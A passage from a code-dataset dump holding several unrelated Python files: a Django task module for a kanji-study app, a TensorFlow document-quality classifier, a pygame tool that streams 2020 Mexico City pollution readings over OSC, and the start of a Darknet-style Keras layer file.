:param user: The user to pull all synonyms for\n :return: None\n '''\n if user:\n for level in user.profile.unlocked_levels_list():\n pull_user_synonyms_by_level(user, level)\n logger.info(\"Pulled user synonyms for {}\".format(user.username))\n else:\n for profile in Profile.objects.all():\n if len(profile.api_key) == 32:\n user = profile.user\n for level in profile.unlocked_levels_list():\n pull_user_synonyms_by_level(user, level)\n logger.info(\"Pulled user synonyms for {}\".format(user.username))\n\n\ndef user_returns_from_vacation(user):\n \"\"\"\n Called when a user disables vacation mode. A one-time pass through their reviews in order to correct their last_studied_date, and quickly run an SRS run to determine which reviews currently need to be looked at.\n \"\"\"\n logger.info(\"{} has returned from vacation!\".format(user.username))\n vacation_date = user.profile.vacation_date\n if vacation_date:\n users_reviews = UserSpecific.objects.filter(user=user, burned=False)\n elapsed_vacation_time = timezone.now() - vacation_date\n updated_count = users_reviews.update(last_studied=F('last_studied') + elapsed_vacation_time)\n users_reviews.update(next_review_date=F('next_review_date') + elapsed_vacation_time)\n logger.info(\"brought {} reviews out of hibernation for {}\".format(updated_count, user.username))\n logger.info(\"User {} has been gone for timedelta: {}\".format(user.username, str(elapsed_vacation_time)))\n user.profile.vacation_date = None\n user.profile.on_vacation = False\n user.profile.save()\n all_srs(user)\n","sub_path":"kw_webapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":24954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"502568031","text":"import tensorflow as tf\nfrom .attention import attention\nclass Model(object):\n def __init__(self, config,vectors):\n self.max_num_sents = config.max_num_sents\n self.max_sent_length = config.max_sent_length\n self.num_classes = config.num_classes - 1\n self.num_simlar_docs = config.num_simlar_docs\n self.similarity_text_field_names = config.similarity_text_field_names\n self.num_concepts = config.num_concepts\n self.concept_dimesions = config.concept_dimesions\n self.vectors = vectors\n self.word_embedding_size = config.word_embedding_size\n self.filter_sizes = config.filter_sizes\n self.num_filters = config.num_filters\n self.num_rnn_units = config.num_rnn_units\n self.attention_size = config.attention_size\n self.rnn_output_keep_prob = config.rnn_output_keep_prob\n self.text_field_names = config.text_field_names\n self.use_loss = config.use_loss\n self.threshold = config.threshold\n self.l2_reg_lambda = config.l2_reg_lambda\n #self.use_noise = config.use_noise\n self.input_doc = []\n self.doc_actual_num_sents = []\n self.doc_actual_sent_lengths = []\n self.similar_docs = []\n self.similar_doc_actual_num_sents = []\n self.similar_doc_actual_sent_lengths = []\n for name in self.text_field_names:\n self.input_doc.append(tf.placeholder(tf.int32, [None, self.max_num_sents[name], self.max_sent_length[name]], name=name + '_input_doc'))\n self.doc_actual_num_sents.append(tf.placeholder(tf.int32, [None], name=name + '_doc_actual_num_sents'))\n self.doc_actual_sent_lengths.append(tf.placeholder(tf.int32, [None, self.max_num_sents[name]], name=name + '_doc_actual_sent_lengths'))\n self.similar_docs.append(tf.placeholder(tf.int32, [None, self.num_simlar_docs, self.max_num_sents[name],\n self.max_sent_length[name]],name=name + '_similar_docs'))\n self.similar_doc_actual_num_sents.append(\n tf.placeholder(tf.int32, [None, self.num_simlar_docs], name=name + '_similar_doc_actual_num_sents'))\n self.similar_doc_actual_sent_lengths.append(tf.placeholder(tf.int32, [None, self.num_simlar_docs, self.max_num_sents[name]], name=name + '_similar_doc_actual_sent_lengths'))\n\n self.input_cls = tf.placeholder(tf.float32, [None,self.num_classes], name='input_cls')\n self.cnn_dropout_keep_prob = tf.placeholder_with_default(1.0,[], name='cnn_dropout_keep_prob')\n self.attention_keep_prob = tf.placeholder_with_default(1.0,[], name='attention_keep_prob')\n self.rnn_output_keep_prob = tf.placeholder_with_default(1.0,[],name='rnn_output_keep_prob')\n self.attention_loss = tf.constant(0.0)\n self.l2_loss = tf.constant(0.0)\n self.fine_tune_word_embedding=config.fine_tune_word_embedding\n\n self.wv_initial = tf.constant(self.vectors, dtype=tf.float32)\n\n def add_embedding_layer(self,input):\n\n\n # Embedding layer\n with tf.variable_scope('embedding',reuse=tf.AUTO_REUSE):\n wordVectors = tf.get_variable('word_vectors', initializer=self.wv_initial,trainable=self.fine_tune_word_embedding)\n embedded_words = tf.nn.embedding_lookup(wordVectors, input)\n return embedded_words\n\n\n def add_bilstm_layer(self,input,actual_length,scope):\n #rnn context\n with tf.variable_scope('bilstm_' + scope, reuse=tf.AUTO_REUSE) :\n lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(self.num_rnn_units, forget_bias=1.0)\n print('fw cell',lstm_fw_cell)\n lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_fw_cell, output_keep_prob=self.rnn_output_keep_prob)\n lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(self.num_rnn_units, forget_bias=1.0)\n print('bw_cell',lstm_fw_cell)\n lstm_bw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_bw_cell, output_keep_prob=self.rnn_output_keep_prob)\n\n bilstm_outputs, _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, input,\n actual_length, dtype=tf.float32)\n return bilstm_outputs\n def add_attention_layer(self,input, scope):\n with tf.name_scope('attention_layer_' + scope):\n attention_output, alphas = attention(input, self.attention_size, return_alphas=True)\n tf.summary.histogram('alphas', alphas)\n attention_output = tf.nn.dropout(attention_output, self.attention_keep_prob)\n return attention_output\n\n def sentence_features(self,input,actual_length):\n\n #sentence_input = tf.reshape(input,[-1,self.max_sent_length,self.word_embedding_size])\n sentence_bilstm_output = self.add_bilstm_layer(input,actual_length,'sent')\n sentence_features = self.add_attention_layer(sentence_bilstm_output,'sent')\n return sentence_features,2 * self.num_rnn_units\n def mask_sequence(self,input,max_length, input_actual_num,last_dimesion_size):\n\n mask = tf.to_float(tf.sequence_mask(input_actual_num, max_length))\n #print('input',input.get_shape())\n #print('mask',mask.get_shape())\n mask = tf.tile(tf.expand_dims(mask,-1),[1,1,last_dimesion_size])\n self.mask_shape = tf.shape(mask)\n masked = input * mask\n return masked\n def doc_features(self,input,actual_num_sents):\n\n doc_bilstm_output,_ = self.add_bilstm_layer(input,actual_num_sents,'doc')\n doc_features = self.add_attention_layer(doc_bilstm_output, 'doc')\n return doc_features\n #print('doc_features',self.doc_features.get_shape())\n\n #def mask(self, input):\n\n def add_fc_layer(self, input, input_size, output_size, scope):\n\n #self.feature = self.cnn_drop\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n W = tf.get_variable(\n 'W',\n shape=[input_size, output_size],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable(name='b', initializer=tf.constant(0.1, shape=[output_size]))\n vectors = tf.nn.xw_plus_b(input, W, b, name='scores')\n return vectors, W, b\n\n def make_prediction(self,probabilities,threshold):\n pred = tf.where(tf.greater(probabilities,threshold),tf.ones_like(probabilities,dtype=tf.float32),tf.zeros_like(probabilities,dtype=tf.float32))\n predictions = tf.identity(tf.reduce_sum(pred,axis = 1) - 1,name='predictions')\n return predictions\n def _doc_prediction(self,input,input_size,num_classes,scope):\n scores, W, b = self.add_fc_layer(input, input_size, num_classes, scope)\n probabilities = tf.nn.sigmoid(scores,name='probabilities')\n #predictions = self.make_prediction(probabilities,self.threshold)\n return scores, probabilities,W,b\n\n def convert_to_concept_space(self,num_to_convert, input, input_size, scope):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n \"\"\"\n W = tf.get_variable(\n 'W',\n shape=[num_to_convert, input_size, output_size],\n initializer=tf.contrib.layers.xavier_initializer())\n\n concept_vector = tf.einsum('bsij,cjk->bscik', input, W)\n \"\"\"\n W = tf.get_variable(\n 'W',\n shape=[num_to_convert, input_size],\n initializer=tf.contrib.layers.xavier_initializer())\n concept_vector = tf.einsum('bsi,ci->bsci', input, W)\n return concept_vector\n\n def doc_prediction(self,input,input_size,scope):\n\n self.doc_cls_scores,self.doc_cls_probabilities,W,b = self._doc_prediction(input,\n input_size,\n self.num_classes,scope)\n self.l2_loss += tf.nn.l2_loss(W)\n self.l2_loss += tf.nn.l2_loss(b)\n #print(self.doc_cls_scores)\n def add_loss(self):\n if self.use_loss == \"cross-entropy\":\n\n with tf.name_scope('loss'):\n doc_losses = tf.constant(0.0)\n #cls = tf.contrib.layers.one_hot_encoding(self.input_cls,num_classes=self.num_classes)\n doc_losses += tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_cls,logits=self.doc_cls_scores)\n self.doc_losses = tf.reduce_mean(doc_losses)\n\n self.loss = self.doc_losses + self.l2_reg_lambda * self.l2_loss\n\n elif self.use_loss == \"square_error\":\n # Calculate mean absolute error\n with tf.name_scope('loss'):\n #diff = tf.subtract(self.predictions, tf.argmax(self.input_y, 1))\n losses = tf.losses.mean_squared_error(self.input_cls, self.doc_cls_probabilities)\n self.loss = tf.reduce_mean(losses) + self.l2_reg_lambda * self.l2_loss\n def build(self):\n features = []\n doc_features = []\n for i, name in enumerate(self.text_field_names):\n\n input_embedded_words = self.add_embedding_layer(self.input_doc[i])\n\n sentence_input = tf.reshape(input_embedded_words, [-1, self.max_sent_length[name], self.word_embedding_size])\n actual_sent_lengths = tf.reshape(self.doc_actual_sent_lengths[i], [-1])\n sentence_features,sentence_num_features = self.sentence_features(sentence_input,actual_sent_lengths)\n\n\n if self.max_num_sents[name] <= 1:\n #features.append(tf.reshape(sentence_features,[-1,sentence_num_features] ))\n doc_features = tf.reshape(sentence_features,[-1,sentence_num_features])\n\n else:\n sentence_features = tf.reshape(sentence_features, [-1, self.max_num_sents[name], sentence_num_features])\n doc_features= self.doc_features(sentence_features,self.doc_actual_num_sents[i])\n\n if name in self.similarity_text_field_names:\n sentence_features = tf.reshape(sentence_features, [-1, self.max_num_sents[name], sentence_num_features])\n doc_features= self.doc_features(sentence_features,self.doc_actual_num_sents[i])\n\n sentence_concepts = self.convert_to_concept_space(self.num_concepts, sentence_features,\n sentence_num_features,\n \"sentence_concept\")\n doc_concepts = tf.reduce_sum(sentence_concepts, axis=1)\n\n similar_doc_input = self.add_embedding_layer(self.similar_docs[i])\n similar_doc_input = tf.reshape(similar_doc_input,\n [-1, self.max_sent_length[name], self.word_embedding_size])\n similar_doc_actual_sent_lengths = tf.reshape(self.similar_doc_actual_sent_lengths[i], [-1])\n\n similar_doc_sentence_feature, similar_doc_sentence_num_features = self.sentence_features(\n similar_doc_input, similar_doc_actual_sent_lengths)\n # similar_doc_sentence_feature, similar_doc_sentence_num_features = tf.reduce_mean(similar_doc_input,axis=1)\n similar_doc_sentence_feature = tf.reshape(similar_doc_sentence_feature,\n [-1, self.max_num_sents[name],\n similar_doc_sentence_num_features])\n\n similar_doc_actual_num_sents = tf.reshape(self.similar_doc_actual_num_sents[i], [-1])\n similar_doc_sentence_feature = self.mask_sequence(similar_doc_sentence_feature,\n self.max_num_sents[name],\n similar_doc_actual_num_sents,\n similar_doc_sentence_num_features)\n\n # similar_doc_sentence_feature = tf.reshape(-1,self.num_simlar_docs,self.max_num_sents,similar_doc_sentence_num_features)\n\n similar_doc_sentence_concept = self.convert_to_concept_space(self.num_concepts,\n similar_doc_sentence_feature,\n similar_doc_sentence_num_features,\n \"sentence_concept\")\n similar_doc_sentence_concept = tf.reduce_sum(similar_doc_sentence_concept, axis=1) # sum all sentence\n\n similar_doc_concepts = tf.reshape(similar_doc_sentence_concept,\n [-1, self.num_simlar_docs, self.num_concepts,\n similar_doc_sentence_num_features])\n # print('one_similar_doc_concept',similar_doc_concepts.get_shape())\n\n doc_concepts = tf.reshape(doc_concepts, [-1, 1, self.num_concepts, sentence_num_features])\n doc_concepts = tf.tile(doc_concepts, [1, self.num_simlar_docs, 1, 1])\n # similar_doc_similarities =self.cal_similarities(doc_concepts,similar_doc_concepts)\n\n similar_doc_similarities = tf.reduce_sum(tf.multiply(doc_concepts, similar_doc_concepts), axis=3)\n print('similar_doc_similarities', similar_doc_similarities.get_shape())\n average_similar_doc_similarities = tf.reduce_mean(similar_doc_similarities, axis=1)\n\n\n final_text_field_features = tf.concat([doc_features, average_similar_doc_similarities], axis=-1)\n features.append(final_text_field_features)\n else:\n features.append(doc_features)\n\n features = tf.concat(features, axis=-1)\n self.doc_prediction(features, features.get_shape()[-1],'doc_predict')\n\n\n self.add_loss()\n\n","sub_path":"qualityRating/ordinal_models/model_v4.py","file_name":"model_v4.py","file_ext":"py","file_size_in_byte":14029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"309276302","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nAIRE 2020\n--------------\nEnvia por OSC promedios de mediciones por contaminante (/aire/nox 126.12)\nUsa datos históricos de enero a abril de 2020.\n\n.Activa desactiva canales\n.Elige modo por canal: estación o promedio\n.Selecciona estación de cada canal\n.plots!\n\n1. cambia rutas de DATA_PATH y FONT_PATH\n2. actualiza OSC_HOST y OSC_PORT\n\"\"\"\n\nimport pygame\nimport json\nimport statistics\nfrom oscpy.client import OSCClient\n\n\npygame.init()\nDATA_PATH = \"contaminantes_2020.JSON\"\nFONT_PATH = \"RevMiniPixel.ttf\"\nN_CONTAMS = 9\nN_ESTACIONES = 28\n\nOSC_HOST = \"127.0.0.1\"\nOSC_PORT = 8000\nOSC_CLIENT = []\n\nW = 850\nH = 500\n\n\ndef pmap(value, inMin, inMax, outMin, outMax):\n \"\"\" like processing's map \"\"\"\n inSpan = inMax - inMin\n outSpan = outMax - outMin\n try:\n transVal = float(value - inMin) / float(inSpan)\n return outMin + (transVal * outSpan)\n except:\n return 0\n\n\n# ... .... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...\nclass Plot():\n def __init__(self, x, y):\n # create and update pixel-style plots\n self.pos = [] #position\n self.sz = [] #size\n self.color = (0,255,0) #color\n self.samples = [] #data\n self.samples_mean = []\n self.a = 00 #actual sample\n self.b = 00 #actual mean\n self.n = 96 #number of samples\n self.esta = \"[-]\"\n # init pos and data\n self.pos = [x,y]\n self.samples = [0.0 for a in range(self.n)]\n self.samples_mean = [0.0 for a in range(self.n)]\n self.font = pygame.font.Font(FONT_PATH, 14)\n\n return\n\n def update(self, new_sample, new_mean, nam):\n # queue new sample and dequeue other data\n self.a = new_sample\n self.samples.append(self.a)\n old = self.samples.pop(0)\n self.b = new_mean\n self.samples_mean.append(self.b)\n old_mean = self.samples_mean.pop(0)\n self.esta = nam\n return\n\n def draw(self, surf, dx, dy):\n # draw the list or create a polygon\n wi = 50\n he = 96*2\n val_max = max(self.samples)\n val_min = min(self.samples)\n mean_max = max(self.samples_mean)\n mean_min = min(self.samples_mean)\n points = [[dx+pmap(s, val_min, val_max, 0, wi), dy+i*2] for i,s in enumerate(self.samples)]\n points_mean = [[dx+pmap(s, mean_min, mean_max, 0, wi), dy+i*2] for i,s in enumerate(self.samples_mean)]\n last_sample = self.samples[-1]\n last_sample_mean = self.samples_mean[-1]\n actual_point = points[-1]\n actual_point_mean = points_mean[-1]\n points = [[dx,dy]] + points + [[dx,dy+(len(self.samples)-1)*2]]\n points_mean = [[dx,dy]] + points_mean + [[dx,dy+(len(self.samples)-1)*2]]\n pygame.draw.polygon(surf, (0,64,0), points_mean, 1)\n pygame.draw.polygon(surf, GREEN, points, 1)\n pygame.draw.rect(surf, (0,64,0), pygame.Rect(dx,dy,wi,he), 1)\n pygame.draw.line(surf, GREEN, (actual_point[0],actual_point[1]-2),(actual_point[0],actual_point[1]+2), 2)\n pygame.draw.line(surf, (0,64,0), (actual_point_mean[0],actual_point_mean[1]-2),(actual_point_mean[0],actual_point_mean[1]+2), 2)\n\n pygame.draw.line(surf, (0,127,0), (dx,dy+he+29),(dx+50,dy+he+29), 1)\n pygame.draw.line(surf, (0,255,0), (actual_point[0],actual_point[1]+25),(actual_point[0],actual_point[1]+29), 2)\n pygame.draw.line(surf, (0,64,0), (actual_point_mean[0],actual_point_mean[1]+33),(actual_point_mean[0],actual_point_mean[1]+36), 2)\n le_color_mean = pygame.Color(int(pmap(last_sample_mean, mean_min, mean_max, 0, 255)),\n int(pmap(last_sample_mean, mean_min, mean_max, 255,0)),\n int(pmap(last_sample_mean, mean_min, mean_max, 255,120)))\n val = self.font.render('W: {:0.2f}'.format(last_sample), 1, GREEN)\n val_mean = self.font.render('M: {:0.2f}'.format(last_sample_mean), 1, (0,127,0))\n surf.blit(val, (dx, 98*2+105))\n surf.blit(val_mean, (dx, 98*2+134))\n n_estacion = self.font.render('< {} >'.format(self.esta), 1, GREEN)\n surf.blit(n_estacion, (dx, dy-20))\n return\n# ... .... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...\n\n\n\n\nestaciones = [\n {\"sig\":\"AJM\", \"nombre\":\"Ajusco Medio\", \"id\":\"242\"},\n {\"sig\":\"ATI\", \"nombre\":\"Atizapán\", \"id\":\"243\"},\n {\"sig\":\"BJU\", \"nombre\":\"Benito Juárez\", \"id\":\"300\"},\n {\"sig\":\"CAM\", \"nombre\":\"Camarones\", \"id\":\"244\"},\n {\"sig\":\"CCA\", \"nombre\":\"Centro de Ciencias de la Atmósfera\", \"id\":\"245\"},\n {\"sig\":\"CHO\", \"nombre\":\"Chalco\", \"id\":\"246\"},\n {\"sig\":\"CUA\", \"nombre\":\"Cuajimalpa\", \"id\":\"248\"},\n {\"sig\":\"CUT\", \"nombre\":\"Cuautitlán\", \"id\":\"249\"},\n {\"sig\":\"FAC\", \"nombre\":\"FES Acatlán\", \"id\":\"250\"},\n {\"sig\":\"FAR\", \"nombre\":\"FES Aragón\", \"id\":\"431\"},\n {\"sig\":\"GAM\", \"nombre\":\"Gustavo A. Madero\", \"id\":\"302\"},\n {\"sig\":\"HGM\", \"nombre\":\"Hospital General de México\", \"id\":\"251\"},\n {\"sig\":\"IZT\", \"nombre\":\"Iztacalco\", \"id\":\"252\"},\n {\"sig\":\"LPR\", \"nombre\":\"La Presa\", \"id\":\"253\"},\n {\"sig\":\"LLA\", \"nombre\":\"Los Laureles\", \"id\":\"254\"},\n {\"sig\":\"MER\", \"nombre\":\"Merced\", \"id\":\"256\"},\n {\"sig\":\"MGH\", \"nombre\":\"Miguel Hidalgo\", \"id\":\"263\"},\n {\"sig\":\"NEZ\", \"nombre\":\"Nezahuacóyotl\", \"id\":\"258\"},\n {\"sig\":\"PED\", \"nombre\":\"Pedregal\", \"id\":\"259\"},\n {\"sig\":\"SAG\", \"nombre\":\"San Agustín\", \"id\":\"260\"},\n {\"sig\":\"SFE\", \"nombre\":\"Santa Fé\", \"id\":\"262\"},\n {\"sig\":\"SAC\", \"nombre\":\"Santiago Acahualtepec\", \"id\":\"432\"},\n {\"sig\":\"TAH\", \"nombre\":\"Tlahuac\", \"id\":\"265\"},\n {\"sig\":\"TLA\", \"nombre\":\"Tlalnepantla\", \"id\":\"266\"},\n {\"sig\":\"TLI\", \"nombre\":\"Tultitlán\", \"id\":\"267\"},\n {\"sig\":\"UIZ\", \"nombre\":\"UAM Iztapalapa\", \"id\":\"268\"},\n {\"sig\":\"UAX\", \"nombre\":\"UAM Xochimilco\", \"id\":\"269\"},\n {\"sig\":\"VIF\", \"nombre\":\"Villa de las Flores\", \"id\":\"270\"},\n {\"sig\":\"XAL\", \"nombre\":\"Xalostoc\", \"id\":\"271\"}\n ]\n\n\n\n# init\nWINDOW = pygame.display.set_mode((W, H))\n\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nRED = (255, 0, 0)\nWHITE = (255, 255, 255)\nBLACK = (0,0,0)\nORANGE = (255,1,120)\nBACKGROUND_COLOR = (0,0,63)\n\n# load stuff, like fonts\nFONT = pygame.font.Font(FONT_PATH, 16)\nFONTmini = pygame.font.Font(FONT_PATH, 14)\n\n# main screen for drawing buttons\nDRAW_SCREEN = pygame.Surface((W,H))\nDRAW_SCREEN.fill(BACKGROUND_COLOR)\nPLOT_SCREEN = pygame.Surface((W,H))\n\n# buttons\nCONTAMS = ['CO','NO','NO2','NOX','O3','PM10','SO2','PM2','PMCO']\nLABELS = [FONT.render(cs, 1, (0, 255, 0)) for cs in CONTAMS]\nBTNS_SWS = [pygame.draw.rect(PLOT_SCREEN, GREEN, pygame.Rect(100+c*75, 350, 50, 50), 2) for c in range(N_CONTAMS)]\nBTNS_MODES = [pygame.draw.rect(PLOT_SCREEN, RED, pygame.Rect(100+c*75, 300, 50, 50), 1) for c in range(N_CONTAMS)]\nBTNS_STATS_L = [pygame.draw.rect(PLOT_SCREEN, BLUE, pygame.Rect(100+c*75, 50, 25, 50), 1) for c in range(N_CONTAMS)]\nBTNS_STATS_R = [pygame.draw.rect(PLOT_SCREEN, BLUE, pygame.Rect(100+c*75+25, 50, 25, 50), 1) for c in range(N_CONTAMS)]\n\n\n# timer events\nTIC_EVENT = pygame.USEREVENT + 1\nTIC_TIMER = 1000\n\n#states and counters\nclock = pygame.time.Clock()\n\nsws = [False for c in range(N_CONTAMS)]\nstats = [c for c in range(N_CONTAMS)]\nmodes = [1 if (c < 5) else 0 for c in range(N_CONTAMS)] # mode 0 is mean, 1 is station\n\nactual_set = [0,0,0,0,0,0,0,0,0,\"\"]\nactual_set_means = [0,0,0,0,0,0,0,0,0,\"\"]\nbuffers = []\npos = (0,0)\nrunning = True\nii=0\nindex_estacion = 2\nesta = \"[*]\"\n\ncontaminantes = {}\nfechas = []\ncurrent_means = []\n\nPLOTS = [Plot(100+i*75, 200) for i in range(N_CONTAMS)]\n\n\n# -osc\ndef init_osc(osc_host = OSC_HOST, osc_port = OSC_PORT):\n global OSC_CLIENT\n OSC_CLIENT = OSCClient(osc_host, osc_port)\n return\ndef update_data_send(i=0):\n global contaminantes, fechas, OSC_CLIENT, actual_set, actual_set_means\n print(\"\\n\\n[timetag]: \", fechas[i])\n pack = contaminantes['pollutionMeasurements']['date'][fechas[i]]\n substances = list(pack.keys())\n actual_set = [0,0,0,0,0,0,0,0,0,fechas[i]]\n actual_set_means = [0,0,0,0,0,0,0,0,0,fechas[i]]\n # -send\n for j,s in enumerate(substances):\n estado_estaciones = pack[s]\n lista_mediciones = [float(estado_estaciones[e]) for e in estado_estaciones.keys() if isFloat(estado_estaciones[e])]\n if (s == \"PM2.5\"): s = \"PM2\"\n # get the mean\n try:\n aux_mean = statistics.mean(lista_mediciones)\n actual_set_means[j] = aux_mean\n except:\n aux_mean = 0\n actual_set_means[j] = 0\n # get the simple data\n e=\"\"\n esta=\"---\"\n try:\n e = estaciones[stats[j]][\"sig\"]\n if (modes[j]): esta = e\n #print (estado_estaciones[e])\n if isFloat(estado_estaciones[e]):\n aux_sam = float(estado_estaciones[e])\n else:\n aux_sam = 0\n actual_set[j] = aux_sam\n except:\n aux_sam = 0\n actual_set[j] = aux_sam\n\n # send\n if sws[j]:\n ruta = '/aire/{}'.format(s.lower())\n ruta = ruta.encode()\n if (modes[j]):\n OSC_CLIENT.send_message(ruta, [aux_sam])\n print(\"{} \\t{:0.3f}\\t({})\".format(s, aux_sam, e))\n else:\n OSC_CLIENT.send_message(ruta, [aux_mean])\n print(\"{} \\t{:0.3f}\\t({:d})\".format(s, aux_mean, len(lista_mediciones)))\n # append data to set\n PLOTS[j].update(aux_sam, aux_mean, esta)\n #if (j==0): plot_one.update(aux_sam, aux_mean, esta)\n return\n\n# -data stuff\ndef load_data():\n global contaminantes,fechas\n # para acceder a los datos del archivo:\n contaminantes = json.load(open(DATA_PATH,'r+'))\n _dates = contaminantes['pollutionMeasurements']['date'].keys()\n fechas = list(_dates)\n print (\"[DATA]: ok\")\n return\n\ndef isFloat(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\n\n# tic for the timer\ndef tic():\n global ii\n update_data_send(ii)\n ii = ii+1\n #print (\"\\t\\t --> Aqui ENVIA DATOS\")\n return\n\n# handlear teclas ;D;D\ndef handle_keys(event):\n global running, stats\n \"\"\"if (event.key == pygame.K_DOWN):\n running = False\n if (event.key == pygame.K_LEFT):\n if(stats[0]>0): stats[0]=stats[0]-1\n if (event.key == pygame.K_RIGHT):\n if(stats[0]<20): stats[0]=stats[0]+1\"\"\"\n\ndef exit_():\n global running\n running=False\n return\n\n# handlear eventos con un diccionario\ndef handle_events():\n event_dict = {\n pygame.QUIT: exit_,\n pygame.KEYDOWN: handle_keys,\n TIC_EVENT: tic\n }\n for event in pygame.event.get():\n if event.type in event_dict:\n if (event.type==pygame.KEYDOWN):\n event_dict[event.type](event)\n else:\n event_dict[event.type]()\n return\n\n# handlear clicks del mouse\ndef handle_mouse_clicks():\n global sws, stats, modes\n # check for mouse pos and click\n pos = pygame.mouse.get_pos()\n pressed1, pressed2, pressed3 = pygame.mouse.get_pressed()\n # Check collision between buttons (switches) and mouse1\n for j,b in enumerate(BTNS_SWS):\n if (b.collidepoint(pos) and pressed1):\n sws[j] = not (sws[j])\n #if (sws[j]==True):\n # conts[j] = conts[j]+1\n print(\"[B{}]!: \".format(j), sws[j])\n # Check collision between buttons (modes) and mouse1\n for j,b in enumerate(BTNS_MODES):\n if (b.collidepoint(pos) and pressed1):\n modes[j] = int(not modes[j])\n print(\"[M{}]!: \".format(j), modes[j])\n # Check collision between buttons (conts_l) and mouse1\n for j,b in enumerate(BTNS_STATS_L):\n if (b.collidepoint(pos) and pressed1):\n if (stats[j] > 0):\n stats[j] = stats[j] - 1\n print(\"[E{}]!: \".format(j), stats[j])\n # Check collision between buttons (conts_l) and mouse1\n for j,b in enumerate(BTNS_STATS_R):\n if (b.collidepoint(pos) and pressed1):\n if (stats[j] < N_ESTACIONES):\n stats[j] = stats[j] + 1\n print(\"[E{}]!: \".format(j), stats[j])\n return\n\n\ndef update_graphics():\n #updaye plots and other gui\n PLOT_SCREEN.fill((0,0,0,255))\n #plot_one.draw(PLOT_SCREEN, 100, 100)\n #BTNS_SWS = [pygame.draw.rect(PLOT_SCREEN, GREEN, pygame.Rect(100+c*75, 350, 50, 50), 2) for c in range(N_CONTAMS)]\n for c in range(N_CONTAMS):\n # do plots\n o_x = 100+c*75\n PLOTS[c].draw(PLOT_SCREEN, o_x, 100)\n # redo btns\n if(sws[c]): pygame.draw.rect(PLOT_SCREEN, GREEN, pygame.Rect(o_x, 350, 50, 50), 2)\n else: pygame.draw.rect(PLOT_SCREEN, (16,127,8), pygame.Rect(o_x, 350, 50, 50), 2)\n # blit on WINDOW\n WINDOW.blit(PLOT_SCREEN, (0, 0))\n pygame.display.flip()\n return\n\n# update labels and other text in display\ndef update_text():\n global LABELS, actual_set, actual_set_means\n # blit on WINDOW\n #WINDOW.blit(DRAW_SCREEN, (0, 0))\n AUX_LABEL = FONT.render('-> i n t e r s p e c i f i c s : ', 1, (32, 48, 0))\n WINDOW.blit(AUX_LABEL, (100, 30))\n AUX_LABEL = FONT.render(' [ AIRE ]', 1, GREEN)\n WINDOW.blit(AUX_LABEL, (390, 30))\n for j in range(N_CONTAMS):\n if sws[j]: LAB = FONT.render(CONTAMS[j], 1, (0, 255, 0))\n else: LAB = FONT.render(CONTAMS[j], 1, (32, 24, 0))\n #WINDOW.blit(LABELS[j], (104+j*75, 354))\n if modes[j]: STA = FONTmini.render(\"{:0.2f}\".format(actual_set[j]), 1, (0, 255, 0))\n else: STA = FONTmini.render(\"{:0.2f}\".format(actual_set_means[j]), 1, (0,127,0))\n WINDOW.blit(LAB, (104+j*75, 354))\n WINDOW.blit(STA, (104+j*75, 384))\n # sign >\n SIG_LABEL = FONTmini.render(\">\", 1, (192,255,0))\n WINDOW.blit(SIG_LABEL, (92+j*75, 330-modes[j]*30))\n CUNT_LABEL = FONT.render(\"[step]: {}\".format(ii), 1, (16,64,32))\n WINDOW.blit(CUNT_LABEL, (450, 450))\n CUNT_LABEL = FONT.render(\"[timetag]: \"+actual_set_means[-1], 1, (16,64,32))\n WINDOW.blit(CUNT_LABEL, (100, 450))\n CUNT_LABEL = FONT.render(\"STAT:MMXX:\", 1, (32,48,0))\n WINDOW.blit(CUNT_LABEL, (650, 450))\n pygame.display.flip()\n return\n\n\n\n\n# the loop from outside\ndef game_loop():\n while running:\n handle_events()\n handle_mouse_clicks()\n update_graphics()\n update_text()\n clock.tick(9)\n\n# the main (init+loop)\ndef main():\n pygame.display.set_caption(' . A i R E .')\n init_osc()\n load_data()\n pygame.time.set_timer(TIC_EVENT, TIC_TIMER)\n game_loop()\n print(\"FIN DE LA TRANSMISSION //...\")\n\nif __name__==\"__main__\":\n main()\n","sub_path":"python/aire_stat.py","file_name":"aire_stat.py","file_ext":"py","file_size_in_byte":14680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"525489451","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization, LeakyReLU, ZeroPadding2D, Concatenate\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras import Model\n\n\nclass DarknetConv2DBNLeaky(tf.keras.layers.Layer):\n \"\"\"Convolutional layer with batch normaltion and leaky relu\"\"\"\n\n def __init__(self, filters, k_size, strides=None, padding=None):\n super(DarknetConv2DBNLeaky, self).__init__()\n self.conv_1 = Conv2D(filters=filters,\n kernel_size=k_size,\n kernel_regularizer=l2(5e-4),\n padding=padding if padding is not None else 'same',\n strides=strides if strides is not None else (1, 1))\n self.batch_normalization_1 = BatchNormalization()\n self.leaky_relu_1 = LeakyReLU(alpha=0.1)\n\n def call(self, *args):\n x = self.conv_1(args)\n x = self.batch_normalization_1(x)\n return self.leaky_relu_1(x)\n\n\nclass DownSampling(tf.keras.layers.Layer):\n \"\"\"Downsample using zeropadding((1, 0), (1, 0)) and a conv with strides 2\"\"\"\n\n def __init__(self, filters):\n super(DownSampling, self).__init__()\n self.conv_2 = DarknetConv2DBNLeaky(filters=filters,\n k_size=(3, 3),\n strides=(2, 2),\n padding='valid')\n self.zeropadding_1 = ZeroPadding2D(((1, 0), (1, 0)))\n\n def call(self, *args):\n x = 